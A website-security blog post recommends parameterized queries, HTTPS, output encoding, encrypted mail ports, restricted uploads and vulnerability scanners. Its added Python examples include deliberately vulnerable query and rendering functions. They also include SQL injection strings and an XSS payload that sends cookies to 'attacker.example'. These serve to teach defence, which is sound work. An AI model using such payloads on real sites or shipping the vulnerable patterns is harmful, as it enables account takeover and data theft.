If there is one reason website owners fail to take even basic steps to protect their blogs and websites from attackers, it is usually because they believe one of two things:

  1. Their website or blog holds nothing of real value to attackers
  2. They will never be attacked anyway

Both mindsets are the opposite of how you should think about website security. Automated attacks do not check whether a site looks valuable before probing it, and failing to take basic precautions puts you and your customers at serious risk of identity theft and fraud.

To help make sure this never happens to you, here are the six simplest steps you can take to protect your website from attackers right now.

Taking these steps will not guarantee that your website or blog is never broken into, but it will significantly reduce the risk:

1 – Shield Your Website Against SQL Injection

An SQL Injection attack occurs when an attacker supplies input (a URL parameter, form field, cookie or request header) that your application copies into a database query, changing the meaning of the query and letting the attacker read or modify your database and, often, gain access to your site.

You are at serious risk if your code builds SQL statements by concatenating user input into a query string, whatever the database dialect, because it is then trivial for an attacker to type SQL syntax into a form field and have it executed as part of your query.

To stop this, use parameterized queries (prepared statements). They are simple to implement, as most web languages and database drivers support them.

For instance, a query built by string concatenation looks like this (PHP with PDO):

$sql = "SELECT * FROM table WHERE column = '" . $parameter . "';";
$rows = $pdo->query($sql)->fetchAll();

If $parameter comes straight from the user, an attacker can close the quoted string and append their own SQL to the end of the statement. To prevent that, you need to parameterize the query.

You can do this by changing it to look like this:

$stmt = $pdo->prepare('SELECT * FROM table WHERE column = :value');
$stmt->execute(array('value' => $parameter)); // the value travels separately from the SQL text and is never parsed as part of it
$rows = $stmt->fetchAll();
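The same contrast in runnable form, as an added example that is not part of the original post: Python with the standard-library sqlite3 driver, a constructed two-row users table, and two constructed injection payloads. The concatenated query behaves like the PHP snippet above and returns rows the attacker should never see; the parameterized version hands the value to the driver separately and returns nothing for the same inputs.

```python
import sqlite3

# Constructed sample data for this example (not from the original post).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# Constructed attacker inputs: the first closes the quoted string and appends
# a tautology, the second closes it and comments out the rest of the statement.
OR_PAYLOAD = "x' OR '1'='1"
COMMENT_PAYLOAD = "bob'--"


def make_db():
    """In-memory database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Builds the statement by string concatenation: user input becomes SQL."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    """Sends SQL text and value separately; the value can never be parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def demo():
    """Run both lookups against normal and hostile input and return the rows."""
    conn = make_db()
    return {
        "vulnerable_normal": lookup_vulnerable(conn, "alice"),
        "vulnerable_or": lookup_vulnerable(conn, OR_PAYLOAD),        # every row
        "vulnerable_comment": lookup_vulnerable(conn, COMMENT_PAYLOAD),  # bob, no password needed
        "param_or": lookup_parameterized(conn, OR_PAYLOAD),          # no such user
        "param_comment": lookup_parameterized(conn, COMMENT_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The comment payload is the one to remember when reviewing login code: with concatenation, the `--` discards whatever `AND password = '...'` clause followed, so the attacker logs in as any user whose name they know.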

From 2015 to 2016 alone, the number of compromised websites increased by 32%. This is why you need to take action right away, and shielding against SQL Injections should be one of the very first security actions that you take.

2 – Install A Secure Sockets Layer (SSL/TLS) Certificate

SSL, and its modern successor TLS, is what puts the S in HTTPS. Serving your website over HTTPS encrypts the traffic between a visitor's browser and your server, so an intruder on the network cannot read or tamper with the content in transit.

This means that users will be able to browse your website securely while submitting their financial information or login details.

For this reason, you must use HTTPS on every page where users submit sensitive information, such as login details or credit card numbers; otherwise an attacker who captures the traffic can steal those credentials or the session cookie and impersonate the user. In practice, serve the whole site over HTTPS and redirect HTTP requests to it, and mark session cookies Secure so the browser never sends them over plain HTTP.

Furthermore, enabling HTTPS will also help make your website more visible, as Google will boost websites in the search engine rankings that use HTTPS.

3 – Guard Against XSS Attacks

An XSS, or Cross-site Scripting, attack differs from attacks such as the SQL Injection discussed above in that it targets the users of an application rather than the application or server itself.

Attackers accomplish this by getting malicious JavaScript included in the output of a web application: anywhere untrusted input is echoed back into a page without being encoded, such as search fields, forums, comment sections, profile fields and cookies. Any of these areas can be vulnerable to Cross-site Scripting.

Once the injected script runs in a victim's browser it executes with that user's privileges on your site: it can read cookies that are not marked HttpOnly (including session IDs), capture keystrokes and form data such as login details or card numbers, and perform actions as the logged-in user.

The most direct defence is to encode every piece of untrusted data for the context in which it is rendered (HTML body, HTML attribute, JavaScript, URL) and to validate input against what it is supposed to be. A security development lifecycle (SDL) helps by reducing the number of such coding errors that reach production; marking session cookies HttpOnly and deploying a Content Security Policy limit what an injected script can do if one slips through.

Something else you can do is require users to re-enter their password before sensitive actions, such as changing an email address or payment details. Even if the user has a cookie that logs them in automatically, re-authentication means a stolen session token on its own is not enough to take over the account. This does not prevent an XSS attack, but it greatly reduces the damage a successful one can do.
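What context-specific output encoding looks like in practice, as an added example that is not part of the original post. The Python below renders a user comment twice: once by concatenation (vulnerable, the pattern described above) and once with each value encoded for the place it lands, an attribute, an href and an element body. The payloads, the `attacker.example` host and the template markup are constructed for this example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker inputs for this example (not from the original post).
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'
URL_PAYLOAD = " JaVaScRiPt:alert(document.cookie)"


def render_comment_unsafe(author, text, homepage):
    """Vulnerable: untrusted strings are concatenated straight into the HTML."""
    return (
        '<div class="comment" data-author="' + author + '">'
        '<a href="' + homepage + '">' + author + '</a>'
        '<p>' + text + '</p></div>'
    )


def safe_href(url):
    """URL context: allow only http(s) links, then HTML-encode the value.
    Encoding alone would not neutralise a javascript: URL, so the scheme
    is checked first; anything else (including a missing scheme) becomes '#'."""
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_comment_safe(author, text, homepage):
    """Each value is encoded for its context: attribute value, href, element body."""
    return (
        '<div class="comment" data-author="' + html.escape(author, quote=True) + '">'
        '<a href="' + safe_href(homepage) + '">' + html.escape(author) + '</a>'
        '<p>' + html.escape(text) + '</p></div>'
    )


if __name__ == "__main__":
    print(render_comment_unsafe(ATTR_PAYLOAD, SCRIPT_PAYLOAD, URL_PAYLOAD))
    print(render_comment_safe(ATTR_PAYLOAD, SCRIPT_PAYLOAD, URL_PAYLOAD))
```

The point of `safe_href` is that the right encoding depends on the context: `html.escape` is correct for the body and attribute values, but a `javascript:` URL contains nothing that HTML encoding changes, so the URL context needs a scheme check in addition to encoding. A templating engine with auto-escaping does the body and attribute cases for you; the URL case usually still needs this explicit check.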

4 – Watch Your Email Transmission Ports

A prime target for attackers is often not your website itself but your email.

Have you ever asked yourself how secure your email transmissions really are?

The good news is that there is a quick and easy way to find out.

Go to your email client or server settings and check which ports you are communicating through.

If you are using IMAP on port 143, POP3 on port 110, or SMTP on port 25 and the connection is not upgraded with STARTTLS, your email transmissions travel in plain text and are NOT secured. These ports can carry encrypted traffic if the client and server negotiate STARTTLS, so check that the option is enabled and set to required rather than opportunistic; an attacker on the path who can strip an optional STARTTLS negotiation sees the plaintext.

If, on the other hand, you are using IMAP on port 993, POP3 on port 995, or SMTP on port 465 (or the mail submission port 587 with STARTTLS required), your connections are encrypted with TLS from the start. Encryption only protects you if the client also verifies the server's certificate, so do not disable certificate checking to silence a warning.

5 – Don’t Allow File Uploads (Or At Least Be Highly Suspicious)

You are always taking a major risk by allowing file uploads to your website in the first place. No matter how harmless an uploaded file may look, it could contain a script that opens your website to attackers if the server can ever be made to execute it.

Even allowing users to upload an image or avatar is a security risk. If you have a form that accepts file uploads, treat every uploaded file with suspicion. You cannot trust the file extension or the Content-Type header to verify that an upload really is an image, because both are chosen by the client. Many image formats allow a comment or metadata section to be stored, so a file that is a perfectly valid image can also carry PHP code, which runs if the web server ever treats the file as a script (for example because it was saved under a .php extension into a web-accessible directory).

The best solution is to block direct access to uploaded files altogether: store them in a directory outside the web root, under a name your server generates, and serve them through a script that looks the file up in that private folder, sets the Content-Type from the verified file type and streams it to the browser.

In addition, if you transfer files to your server yourself, use an encrypted transport such as SFTP or SCP over SSH rather than plain FTP. It is also wise to run your database on a server separate from your web server, so a compromised web server does not hand the attacker the database host as well.

If you use cloud hosting, many providers let you permit or deny file uploads based on a visitor's location, as determined by their IP address.

You could block uploads from specific countries, say China and Iran, while permitting everything else. Or conversely, you could block uploads from any IP address except those originating from whitelisted geos — eg, the United States, U.K., Canada, etc.

Personally, I’ve found it more effective to simply stop direct access to any file uploads and/or uploaded files on my sites. Masking an IP address is child’s play, as any VPN reviews would attest to. Most leading virtual private network providers are able to mask IP addresses with near certainty. Further, a no-tolerance policy is often the best solution for keeping out malicious files (and helps me sleep better at night).

6 – Invest in Website Vulnerability Scanners

Finally, you can also invest in a website vulnerability scanner that will identify technical weaknesses in your website, including ones that expose it to SQL Injection and XSS attacks, among many others.

When choosing a website vulnerability scanner, there are several key features to look for.

For instance, it is important that your scanner covers vulnerabilities beyond common ones such as Cross-site Scripting. One example of a less obvious weakness your scanner should detect is an unprotected directory, such as one with directory listing left enabled or backup files left accessible.

It is also critical that your scanner stays relevant over time, so it should be updated continuously with the most recently disclosed vulnerabilities. That means the scanner needs a well-qualified team behind the scenes working to stay ahead of cyber criminals.

Finally, pay close attention to scalability as well, especially if you have hundreds if not thousands of applications that you need to cover.

Conclusion

In conclusion, these are six simple yet effective ways to keep your website secure from attackers.

Again, these methods won’t guarantee your website’s security, but they will make it significantly more secure and less appealing to attackers than it was before, and that’s what matters.

Frequently asked questions

Public websites cannot be fully protected against hacking attempts. The best way to protect them is to find vulnerabilities using a specialized scanner and eliminate them. You can also temporarily mitigate vulnerabilities with a web application firewall until you are able to fix them.

Learn how Acunetix can work together with a web application firewall.

To protect a WordPress site you must immediately install all WordPress and plugin updates. However, certain vulnerabilities may exist even if you are using the latest versions. Therefore, to make sure that your WordPress site is safe, you need to use a vulnerability scanner regularly.

Learn about best security practices for your WordPress site.

There are three types of problems that can affect websites: web vulnerabilities, network vulnerabilities, and malware. The most dangerous are web vulnerabilities, so you need a web vulnerability scanner. However, Acunetix can scan your website for network problems and malware as well.

Learn how to enable malware scanning in Acunetix.

Some web vulnerabilities can let an attacker gain access to your resources, databases, operating systems, and potentially move on to your other systems. Other web vulnerabilities can endanger your users and let attackers steal their credentials. Even minor unprotected websites can cause major problems.

See how a black hat hacker can gain complete control of a system through the web.

To be safe, schedule a weekly full vulnerability scan, a daily incremental scan, and a daily high-risk vulnerability scan. Scan not only your production websites but your staging websites as well. If you build your own web software, integrate Acunetix into the SDLC.

Learn more about web application security best practices.

THE AUTHOR
Samuel Bocetta
Retired Research Engineer and Freelance Journalist
Sam Bocetta is a freelance journalist specializing in U.S. diplomacy and national security, with emphases on technology trends in cyberwarfare, cyberdefense, and cryptography. He currently works part-time as a cybersecurity coordinator.